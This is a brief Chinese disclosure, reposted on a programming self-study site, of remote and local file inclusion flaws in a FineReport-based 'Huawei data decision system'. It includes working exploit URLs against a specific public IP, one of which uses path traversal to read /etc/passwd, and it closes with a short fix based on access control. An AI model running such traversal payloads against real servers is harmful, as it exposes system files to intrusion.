系统:华为数据决策系统
貌似是一个通用软件——finereport报表系统
官网:http://www.finereport.com/
测试的版本是Linux版7.0的,系统存在远程文件包含 漏洞
http://221.194.146.18:8081/WebReport7/ReportServer?op=resource&resource=http://www.baidu.com/
也存在本地文件包含
http://221.194.146.18:8081/WebReport7/ReportServer?op=resource&resource=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
修复方案:
改不了 源码 的话,直接做访问控制吧
查看更多关于华为某系统文件包含漏洞 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13474